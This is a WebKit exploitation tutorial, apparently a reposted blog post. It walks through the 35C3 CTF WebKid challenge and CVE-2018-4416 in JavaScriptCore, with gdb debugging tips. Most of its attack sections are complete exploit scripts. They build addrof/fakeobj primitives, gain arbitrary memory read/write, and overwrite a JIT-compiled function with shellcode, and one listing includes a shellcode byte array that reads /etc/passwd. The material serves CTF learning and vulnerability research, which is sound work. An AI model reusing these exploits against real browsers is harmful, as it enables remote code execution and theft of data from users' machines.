Exploitation Before we start exploiting bugs, we should look at how difficult it is to write an exploit. We focus on exploit code writing here, the detail of the vulnerability will not be introduced much. This challenge is WebKid from 35c3 CTF. You can compile WebKit binary(with instructions), prepared VM, and get exploit code here. Also, a macOS Mojave (10.14.2) should be prepared in VM or real machine (I think it won’t affect crashes in different versions of macOS, but the attack primitive might be different). Run via this command: DYLD_LIBRARY_PATH=/Path/to/WebKid DYLD_FRAMEWORK_PATH=/Path/to/WebKid /Path/to/WebKid/MiniBrowser.app/Contents/MacOS/MiniBrowser Remember to use FULL PATH. Otherwise, the browser will crash If running on a local machine, remember to create /flag1 for testing. Analyzing Let’s look at the patch: diff --git a/Source/JavaScriptCore/runtime/JSObject.cpp b/Source/JavaScriptCore/runtime/JSObject.cpp index 20fcd4032ce..a75e4ef47ba 100644 --- a/Source/JavaScriptCore/runtime/JSObject.cpp +++ b/Source/JavaScriptCore/runtime/JSObject.cpp @@ -1920,6 +1920,31 @@ bool JSObject::hasPropertyGeneric(ExecState* exec, unsigned propertyName, Proper return const_cast<JSObject*>(this)->getPropertySlot(exec, propertyName, slot); } +static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) +{ + ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); + + Structure* previous = structure->previousID(); + if (!previous) + return false; + + unsigned unused; + bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); + if (!isLastAddedProperty) + return false; + + RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); + + if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { + ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); + thisObject->setButterfly(vm, nullptr); + } + + thisObject->setStructure(vm, previous); + + return true; +} + // ECMA 8.6.2.5 bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName propertyName) { @@ -1946,18 +1971,21 @@ bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName proper Structure* structure = thisObject->structure(vm); - bool propertyIsPresent = isValidOffset(structure->get(vm, propertyName, attributes)); + PropertyOffset offset = structure->get(vm, propertyName, attributes); + bool propertyIsPresent = isValidOffset(offset); if (propertyIsPresent) { if (attributes & PropertyAttribute::DontDelete && vm.deletePropertyMode() != VM::DeletePropertyMode::IgnoreConfigurable) return false; - PropertyOffset offset; - if (structure->isUncacheableDictionary()) + if (structure->isUncacheableDictionary()) { offset = structure->removePropertyWithoutTransition(vm, propertyName, [] (const ConcurrentJSLocker&, PropertyOffset) { }); - else - thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } else { + if (!tryDeletePropertyQuickly(vm, thisObject, structure, propertyName, attributes, offset)) { + thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } + } - if (offset != invalidOffset) + if (offset != invalidOffset && (!isOutOfLineOffset(offset) || thisObject->butterfly())) thisObject->locationForOffset(offset)->clear(); } diff --git a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in index 536481ecd6a..62189fea227 100644 --- a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in +++ b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in @@ -25,6 +25,12 @@ (deny default (with partial-symbolication)) (allow system-audit file-read-metadata) +(allow file-read* (literal "/flag1")) + +(allow mach-lookup (global-name "net.saelo.shelld")) +(allow mach-lookup (global-name "net.saelo.capsd")) +(allow mach-lookup (global-name "net.saelo.capsd.xpc")) + #if PLATFORM(MAC) && __MAC_OS_X_VERSION_MIN_REQUIRED < 101300 (import "system.sb") #else The biggest problem here is about tryDeletePropertyQuickly function, which acted like this (comment provided from Linus Henze: static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) { // This assert will always be true as long as we're not passing an "invalid" offset ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); // Try to get the previous structure of this object Structure* previous = structure->previousID(); if (!previous) return false; // If it has none, stop here unsigned unused; // Check if the property we're deleting is the last one we added // This must be the case if the old structure doesn't have this property bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); if (!isLastAddedProperty) return false; // Not the last property? Stop here and remove it using the normal way. // Assert that adding the property to the last structure would result in getting the current structure RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); // Uninteresting. Basically, this just deletes this objects Butterfly if it's not an array and we're asked to delete the last out-of-line property. The Butterfly then becomes useless because no property is stored in it, so we can delete it. if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); thisObject->setButterfly(vm, nullptr); } // Directly set the structure of this object thisObject->setStructure(vm, previous); return true; } In short, one object will fall back to previous structure ID by deleting an object added previously. For example: var o = [1.1, 2.2, 3.3, 4.4]; // o is now an object with structure ID 122. o.property = 42; // o is now an object with structure ID 123. The structure is a leaf (has never transitioned) function helper() { return o[0]; } jitCompile(helper); // Running helper function many times // In this case, the JIT compiler will choose to use a watchpoint instead of runtime checks // when compiling the helper function. As such, it watches structure 123 for transitions. delete o.property; // o now "went back" to structure ID 122. The watchpoint was not fired. Let’s review some knowledge first. In JSC, we have runtime type checks and watchpoint to ensure correct type conversion. After a function running many times, the JSC will not use structure check. Instead, it will replace it with watchpoint. When an object is modified, the browser should trigger watchpoint to notify this change to fallback to JS interpreter and generate new JIT code. Here, restoring to the previous ID does will not trigger watchpoint even though the structure has changed, which means the structure of butterfly pointer will also be changed. However, the JIT code generated by helper will not fallback since watchpoint is not trigged, leading to type confusion. And the JIT code can still access legacy butterfly structure. We can leak/create fake objects. This is the minimum attack primitive: haxxArray = [13.37, 73.31]; haxxArray.newProperty = 1337; function returnElem() { return haxxArray[0]; } function setElem(obj) { haxxArray[0] = obj; } for (var i = 0; i < 100000; i++) { returnElem(); setElem(13.37); } delete haxxArray.newProperty; haxxArray[0] = {}; function addrof(obj) { haxxArray[0] = obj; return returnElem(); } function fakeobj(address) { setElem(address); return haxxArray[0]; } // JIT code treat it as intereger, but it actually should be an object. // We can leak address from it print(addrof({})); // Almost the same as above, but it's for write data print(fakeobj(addrof({}))); Utility Functions The exploit script creates many utility functions. They help us to create primitive which you need in almost every webkit exploit. We will only look at some important functions. Getting Native Code To attack, we need a native code function to write shellcode or ROP. Besides, functions will only be a native code after running many times(this one is in pwn.js? function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } Controlling Bytes In the int64.js, we craft a class Int64. It uses Uint8Array to store number and creates many related operations like add and sub. In the previous chapter, we mention that JavaScript uses tagged value to represent the number, which means that you cannot control the higher byte. The Uint8Array array represents 8-bit unsigned integers just like native value, allowing us to control all 8 bytes. Simple example usage of Uint8Array: var x = new Uint8Array([17, -45.3]); var y = new Uint8Array(x); console.log(x[0]); // 17 console.log(x[1]); // value will be converted 8 bit unsigned integers // 211 It can be merged to a 16 byte array. The following shows us that Uint8Array store in native form clearly, because 0x0201 == 513: a = new Uint8Array([1,2,3,4]) b = new Uint16Array(a.buffer) // Uint16Array [513, 1027] Remaining functions of Int64 are simulations of different operations. You can infer their implementations from their names and comments. Reading the codes is easy too. Writing Exploit Detail about the Script I add some comments from Saelo’s original writeup(most comments are still his work, great thanks!): const ITERATIONS = 100000; // A helper function returns function with native code function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); // Return a function with native code, we will palce shellcode in this function later function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } function setup_addrof() { var o = [1.1, 2.2, 3.3, 4.4]; o.addrof_property = 42; // JIT compiler will install a watchpoint to discard the // compiled code if the structure of |o| ever transitions // (a heuristic for |o| being modified). As such, there // won't be runtime checks in the generated code. function helper() { return o[0]; } jitCompile(helper); // This will take the newly added fast-path, changing the structure // of |o| without the JIT code being deoptimized (because the structure // of |o| didn't transition, |o| went "back" to an existing structure). delete o.addrof_property; // Now we are free to modify the structure of |o| any way we like, // the JIT compiler won't notice (it's watching a now unrelated structure). o[0] = {}; return function(obj) { o[0] = obj; return Int64.fromDouble(helper()); }; } function setup_fakeobj() { var o = [1.1, 2.2, 3.3, 4.4]; o.fakeobj_property = 42; // Same as above, but write instead of reading from the array. function helper(addr) { o[0] = addr; } jitCompile(helper, 13.37); delete o.fakeobj_property; o[0] = {}; return function(addr) { helper(addr.asDouble()); return o[0]; }; } function pwn() { var addrof = setup_addrof(); var fakeobj = setup_fakeobj(); // verify basic exploit primitives work. var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); print('[+] exploit primitives working'); // from saelo: spray structures to be able to predict their IDs. // from Auxy: I am not sure about why spraying. i change the code to: // // var structs = [] // var i = 0; // var abc = [13.37]; // abc.pointer = 1234; // abc['prop' + i] = 13.37; // structs.push(abc); // var victim = structs[0]; // // and the payload still work stablely. It seems this action is redundant var structs = [] for (var i = 0; i < 0x1000; ++i) { var array = [13.37]; array.pointer = 1234; array['prop' + i] = 13.37; structs.push(array); } // take an array from somewhere in the middle so it is preceeded by non-null bytes which // will later be treated as the butterfly length. var victim = structs[0x800]; print(`[+] victim @ ${addrof(victim)}`); // craft a fake object to modify victim var flags_double_array = new Int64("0x0108200700001000").asJSValue(); var container = { header: flags_double_array, butterfly: victim }; // create object having |victim| as butterfly. var containerAddr = addrof(container); print(`[+] container @ ${containerAddr}`); // add the offset to let compiler recognize fake structure var hax = fakeobj(Add(containerAddr, 0x10)); // origButterfly is now based on the offset of **victim** // because it becomes the new butterfly pointer // and hax[1] === victim.pointer var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; // Testing code, not related to exploit var plainObj = {}; var header = memory.read64(addrof(plainObj)); memory.writeInt64(memory.addrof(container), header); memory.test(); print("[+] limited memory read/write working"); // get targetd function var func = makeJITCompiledFunction(); var funcAddr = memory.addrof(func); // change the JIT code to shellcode // offset addjustment is a little bit complicated here :P print(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); print(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); print(`[+] JITCode instance @ ${jitCodeObjAddr}`); // var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); // offset for debug builds // final JIT Code address var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); print(`[+] JITCode @ ${jitCodeAddr}`); var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); shellcode.push(...strData.bytes()); // write shellcode memory.write(jitCodeAddr, shellcode); // trigger shellcode var res = func(); var flag = s.split('\n')[0]; if (typeof(alert) !== 'undefined') alert(flag); print(flag); } if (typeof(window) === 'undefined') pwn(); Conclusion on the Exploitation To conclude, the exploit uses two most important attack primitive - addrof and fakeobj - to leak and craft. A JITed function is leaked and overwritten with our shellcode array. Then we called the function to leak flag. Almost all the browser exploits follow this form. Thanks, 35C3 CTF organizers especially Saelo. It’s a great challenge to learn WebKit type confusion. Debugging WebKit Now, we have understood all the theories: architecture, object model, exploitation. Let’s start some real operations. To prepare, use compiled JSC from Setup part. Just use the latest version since we only discuss debugging here. I used to try to set breakpoints to find their addresses, but this is actually very stupid. JSC has many non-standard functions which can dump information for us (you cannot use most of them in Safari!): print() and debug(): Like console.log() in node.js, it will output information to our terminal. However, print in Safari will use a real-world printer to print documents. describe(): Describe one object. We can get the address, class member, and related information via the function. describeArrya(): Similar to describe(), but it focuses on array information of an object. readFile(): Open a file and get the content noDFG() and noFLT(): Disable some JIT compilers. Setting Breakpoints The easiest way to set breakpoints is breaking an unused function. Something like print or Array.prototype.slice([]);. Since we do not know if a function will affect one PoC most of the time, this method might bring some side effect. Setting vulnerable functions as our breakpoints also work. When you try to understand a vulnerability, breaking them will be extremely important. But their calling stacks may not be pleasant. We can also customize a debugging function (use int 3) in WebKit source code. Defining, implementing, and registering our function in /Source/JavaScriptCore/jsc.cpp. It helps us to hang WebKit in debuggers: static EncodedJSValue JSC_HOST_CALL functionDbg(ExecStage*); addFunction(vm, "dbg", functionDbg, 0); static EncodedJSValue JSC_HOST_CALL functionDbg(ExecStage* exec) { asm("int 3"); return JSValue::encode(jsUndefined()); } Since the third method requires us to modify the source code, I prefer the previous two personally. Inspecting JSC Objects Okay, we use this script: arr = [0, 1, 2, 3] debug(describe(arr)) print() Use our gdb with gef to debug; you may guess out we will break the print(): gdb jsc gef> b *printInternal gef> r --> Object: 0x7fffaf4b4350 with butterfly 0x7ff8000e0010 (Structure 0x7fffaf4f2b50:[Array, {}, CopyOnWriteArrayWithInt32, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 100 ... // Some backtrace The Object address and butterfly pointer might vary on your machine. If we edit the script, the address may also change. Please adjust them based on your output. We shall have a first glance on the object and its pointer: gef> x/2gx 0x7fffaf4b4350 0x7fffaf4b4350: 0x0108211500000064 0x00007ff8000e0010 gef> x/4gx 0x00007ff8000e0010 0x7ff8000e0010: 0xffff000000000000 0xffff000000000001 0x7ff8000e0020: 0xffff000000000002 0xffff000000000003 What if we change it to float? arr = [1.0, 1.0, 2261634.5098039214, 2261634.5098039214] debug(describe(arr)) print() We use a small trick here: 2261634.5098039214 represents as 0x4141414141414141 in memory. Finding value is more handy via the magical number (we use butterfly pointer directly here). In default, JSC will filled unused memory with 0x00000000badbeef0: gef> x/10gx 0x00007ff8000e0010 0x7ff8000e0010: 0x3ff0000000000000 0x3ff0000000000000 0x7ff8000e0020: 0x4141414141414141 0x4141414141414141 0x7ff8000e0030: 0x00000000badbeef0 0x00000000badbeef0 0x7ff8000e0040: 0x00000000badbeef0 0x00000000badbeef0 0x7ff8000e0050: 0x00000000badbeef0 0x00000000badbeef0 The memory layout is the same as the JSC Object Model part, so we won’t repeat here. Getting Native Code Now, it’s time to get compiled function. It plays an important role in understanding JSC compiler and exploiting: const ITERATIONS = 100000; function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); debug("jitCompile Ready") function makeJITCompiledFunction() { function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } func = makeJITCompiledFunction() debug(describe(func)) print() It’s not hard if you read previous section carefully. Now, we should get their native code in the debugger: --> Object: 0x7fffaf468120 with butterfly (nil) (Structure 0x7fffaf4f1b20:[Function, {}, NonArray, Proto:0x7fffaf4d0000, Leaf]), StructureID: 63 ... // Some backtrace ... gef> x/gx 0x7fffaf468120+24 0x7fffaf468138: 0x00007fffaf4fd080 gef> x/gx 0x00007fffaf4fd080+24 0x7fffaf4fd098: 0x00007fffefe46000 // In debug mode, it's okay to use 368 as offset // In release mode, however, it should be 352 gef> x/gx 0x00007fffefe46000+368 0x7fffefe46170: 0x00007fffafe02a00 gef> hexdump byte 0x00007fffafe02a00 0x00007fffafe02a00 55 48 89 e5 48 8d 65 d0 48 b8 60 0c 45 af ff 7f UH..H.e.H.`.E... 0x00007fffafe02a10 00 00 48 89 45 10 48 8d 45 b0 49 bb b8 2e c1 af ..H.E.H.E.I..... 0x00007fffafe02a20 ff 7f 00 00 49 39 03 0f 87 9c 00 00 00 48 8b 4d ....I9.......H.M 0x00007fffafe02a30 30 48 b8 00 00 00 00 00 00 ff ff 48 39 c1 0f 82 0H.........H9... Put you dump byte to rasm2: rasm -d "you dump byte here" push ebp dec eax mov ebp, esp dec eax lea esp, [ebp - 0x30] dec eax mov eax, 0xaf450c60 invalid jg 0x11 add byte [eax - 0x77], cl inc ebp adc byte [eax - 0x73], cl inc ebp mov al, 0x49 mov ebx, 0xafc12eb8 invalid jg 0x23 add byte [ecx + 0x39], cl add ecx, dword [edi] xchg dword [eax + eax - 0x74b80000], ebx dec ebp xor byte [eax - 0x48], cl add byte [eax], al add byte [eax], al add byte [eax], al invalid dec dword [eax + 0x39] ror dword [edi], 0x82 Emmmm…the disassembly code is partially incorrect. At least we can see a draft now. 1 Day Exploitation Let’s use the bug in triggering bug section: CVE-2018-4416. It’s a type confusion. Since we already talked about WebKid, a similar CTF challenge which has type confusion bug, it won’t be difficult to understand this one. Switch to the vulnerable branch and start our journey. PoC is provided at the beginning of the article. Copy and paste the int64.js, shellcode.js, and utils.js from WebKid repo to your virtual machine. Root Cause Quotation from Lokihardt The following is description of CVE-2018-4416 from Lokihardt, with my partial highlight. When a for-in loop is executed, a JSPropertyNameEnumerator object is created at the beginning and used to store the information of the input object to the for-in loop. Inside the loop, the structure ID of the “this” object of every get_by_id expression taking the loop variable as the index is compared to the cached structure ID from the JSPropertyNameEnumerator object. If it’s the same, the “this” object of the get_by_id expression will be considered having the same structure as the input object to the for-in loop has. The problem is, it doesn’t have anything to prevent the structure from which the cached structure ID from being freed. As structure IDs can be reused after their owners get freed, this can lead to type confusion. Line by Line Explanation Comment in /* */ is my analysis, which might be inaccurate. Comment after // is by Lokihardt: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } /* Step 3 */ /* This is abother target */ /* We want to confuse it(tmp) with obj(fake_object_memory) */ let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. /* Step 4 */ /* Change the structure of tmp to {} */ tmp.__proto__ = {}; gc(); /* The structure of obj is also {} now */ obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. /* Step 5 */ /* Compiler believes obj and tmp share the same type now */ /* Thus, obj[k] will retrieve data from object with offset a */ /* In the patched version, it should be undefined */ return obj[k]; // Type confusion. } } /* Step 0 */ /* Prepare structure {} */ opt({}); /* Step 1 */ /* Target Array, 0x1234 is our fake address*/ let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; /* Step 2 */ /* Trigger type confusion*/ let fake_object = opt(fake_object_memory); /* JSC crashed */ print(fake_object); Debugging Let’s debug it to verify our thought. I modify the original PoC for easier debugging. But they are almost identical except additional print(): function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. debug("Confused Object: " + describe(obj)); return obj[k]; // Type confusion. } } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x41424344; let fake_object = opt(fake_object_memory); print() print(fake_object) Then gdb ./jsc, b *printInternal, and r poc.js. We can get: ... --> Confused Object: Object: 0x7fffaf6b0080 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Object, {}, NonArray, Proto:0x7fffaf6b3e80, Leaf]), StructureID: 142 --> Confused Object: Object: 0x7fffaf6cbe40 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Uint32Array, {}, NonArray, Proto:0x7fffaf6b3e00, Leaf]), StructureID: 142 ... Let’s take a glance at our fake address. JSC is too large to find your dream breakpoint. Let’s set a watchpoint to track its flow instead: gef> x/4gx 0x7fffaf6cbe40 0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000 0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064 gef> x/4gx 0x00007fe8014fc000 0x7fe8014fc000: 0x0000000041424344 0x0000000000000000 0x7fe8014fc010: 0x0000000000000000 0x0000000000000000 gef> rwatch *0x7fe8014fc000 Hardware read watchpoint 2: *0x7fe8014fc000 We get expected output later: Thread 1 "jsc" hit Hardware read watchpoint 2: *0x7fe8014fc000 Value = 0x41424344 0x00005555555bebd4 in JSC::JSCell::structureID (this=0x7fe8014fc000) at ../../Source/JavaScriptCore/runtime/JSCell.h:133 133 StructureID structureID() const { return m_structureID; } But why does it show at structure ID? We can get answer from their memory layout: obj (fake_object_memory): 0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000 0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064 tmp ({a: 1}): 0x7fffaf6cbdc0: 0x000016000000008b 0x0000000000000000 0x7fffaf6cbdd0: 0xffff000000000001 0x0000000000000000 So, the pointer of Uin32Array is returned as an object. And m_structureID is at the beginning of each JS Objects. Since 0x1234 is the first element of our array, it’s reasonable for structureID() to retrieve it. We can use data in Uint32Array to craft fake object now. Awesome! Constructing Attack Primitive addrof Now, we should craft a legal object. I choose {} (an empty object) as our target. How does an empty look like in memory(ignore scripting and debugging here): 0x7fe8014fc000: 0x010016000000008a 0x0000000000000000 Okay, it begins with 0x010016000000008a. We can simulate it in Uint32Array handy(remember to paste gc and opt to here): function gc() { ... // Same as above's } function opt(obj) { ... // Same as above;s } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); fake_object.a = {} print(fake_object_memory[4]) print(fake_object_memory[5]) Two mystery numbers are returned: 2591768192 # hex: 0x9a7b3e80 32731 # hex: 0x7fdb Obviously, it is in pointer format. We can leak arbitrary object now! fakeobj Getting a fakeob is almost identical to crafting addrof. The difference is that you need to fill an address to UInt32Array, then get the object via attribute a in fake_object Arbitrary R/W and Shellcode Execution It’s similar to the exploit script in WebKid challenge. The full script is too long to explain line by line. You can, however, find it here. You may need to try around 10 rounds to exploit successfully. It will read your /etc/passwd when succeed. Here is the core code: // get compiled function var func = makeJITCompiledFunction(); function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } // Typr confusion here function opt(obj) { for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // Compiler are misleaded that obj and tmp shared same type return obj[k]; } } opt({}); // Use Uint32Array to craft a controable memory // Craft a fake object header let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); debug(describe(fake_object)) // Use JIT to stablized our attribute // Attribute a will be used by addrof/fakeobj // Attrubute b will be used by arbitrary read/write for (i = 0; i < 0x1000; i ++) { fake_object.a = {test : 1}; fake_object.b = {test : 1}; } // get addrof // we pass a pbject to fake_object // since fake_object is inside fake_object_memory and represneted as integer // we can use fake_object_memory to retrieve the integer value function setup_addrof() { function p32(num) { value = num.toString(16) return "0".repeat(8 - value.length) + value } return function(obj) { fake_object.a = obj value = "" value = "0x" + p32(fake_object_memory[5]) + "" + p32(fake_object_memory[4]) return new Int64(value) } } // Same // But we pass integer value first. then retrieve object function setup_fakeobj() { return function(addr) { //fake_object_memory[4] = addr[0] //fake_object_memory[5] = addr[1] value = addr.toString().replace("0x", "") fake_object_memory[4] = parseInt(value.slice(8, 16), 16) fake_object_memory[5] = parseInt(value.slice(0, 8), 16) return fake_object.a } } addrof = setup_addrof() fakeobj = setup_fakeobj() debug("[+] set up addrof/fakeobj") var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); debug('[+] exploit primitives working'); // Use fake_object + 0x40 cradt another fake object for read/write var container_addr = Add(addrof(fake_object), 0x40) fake_object_memory[16] = 0x00001000; fake_object_memory[17] = 0x01082007; var structs = [] for (var i = 0; i < 0x1000; ++i) { var a = [13.37]; a.pointer = 1234; a['prop' + i] = 13.37; structs.push(a); } // We will use victim as the butterfly pointer of contianer object victim = structs[0x800] victim_addr = addrof(victim) victim_addr_hex = victim_addr.toString().replace("0x", "") fake_object_memory[19] = parseInt(victim_addr_hex.slice(0, 8), 16) fake_object_memory[18] = parseInt(victim_addr_hex.slice(8, 16), 16) // Overwrite container to fake_object.b container_addr_hex = container_addr.toString().replace("0x", "") fake_object_memory[7] = parseInt(container_addr_hex.slice(0, 8), 16) fake_object_memory[6] = parseInt(container_addr_hex.slice(8, 16), 16) var hax = fake_object.b var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. // we change the butterfly of victim to addr + 0x10 // when victim change the pointer attribute, it will read butterfly - 0x10 // which equal to addr + 0x10 - 0x10 = addr // read arbiutrary value is almost the same writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; memory.test(); debug("[+] limited memory read/write working"); // Get JIT code address debug(describe(func)) var funcAddr = memory.addrof(func); debug(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); debug(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); debug(`[+] JITCode instance @ ${jitCodeObjAddr}`); var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); //var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); debug(`[+] JITCode @ ${jitCodeAddr}`); // Our shellcode var shellcode = [0xeb, 0x3f, 0x5f, 0x80, 0x77, 0xb, 0x41, 0x48, 0x31, 0xc0, 0x4, 0x2, 0x48, 0x31, 0xf6, 0xf, 0x5, 0x66, 0x81, 0xec, 0xff, 0xf, 0x48, 0x8d, 0x34, 0x24, 0x48, 0x89, 0xc7, 0x48, 0x31, 0xd2, 0x66, 0xba, 0xff, 0xf, 0x48, 0x31, 0xc0, 0xf, 0x5, 0x48, 0x31, 0xff, 0x40, 0x80, 0xc7, 0x1, 0x48, 0x89, 0xc2, 0x48, 0x31, 0xc0, 0x4, 0x1, 0xf, 0x5, 0x48, 0x31, 0xc0, 0x4, 0x3c, 0xf, 0x5, 0xe8, 0xbc, 0xff, 0xff, 0xff, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x41] var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); // write shellcode shellcode.push(...strData.bytes()); memory.write(jitCodeAddr, shellcode); // trigger and get /etc/passwd func(); print() Acknowledgement Thanks to Sakura0 who guides me from the sketch. Otherwise, this post will come out much slower. I will also acknowledge all the authors in the reference list. Your share encourages the whole info-sec community! References Groß S, 2018, Black Hat USA, “Attacking Client-Side JIT Compilers” Han C, “js-vuln-db” Gianni A and Heel1an S, “Exploit WebKit Heap” Filip Pizlo, http://www.filpizlo.com, Thanks for many presentations! Groß S, 2018, 35C3 CTF WebKid Challenge dwfault, 2018, WebKit Debugging Skills Tags: WebKit Categories: Tutorial Updated: December 05, 2018 Sursa: https://www.auxy.xyz/tutorial/Webkit-Exp-Tutorial/#acknowledgement
-
- 1
-
-
